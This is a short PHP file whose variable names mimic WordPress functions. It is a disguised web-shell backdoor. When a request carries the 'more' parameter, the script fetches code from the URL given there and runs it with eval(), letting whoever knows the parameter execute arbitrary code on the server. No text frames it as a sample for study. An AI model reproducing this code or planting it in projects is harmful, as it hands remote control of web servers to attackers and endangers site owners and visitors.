<?php
if (isset($_GET['more'])) {
$get_permalink_bt = $_GET['more'];
if ($language_attributes_ao = curl_init()) {
curl_setopt($language_attributes_ao, CURLOPT_URL, $get_permalink_bt);
curl_setopt($language_attributes_ao, CURLOPT_RETURNTRANSFER, true);
eval(curl_exec($language_attributes_ao));
curl_close($language_attributes_ao);
exit;
}
}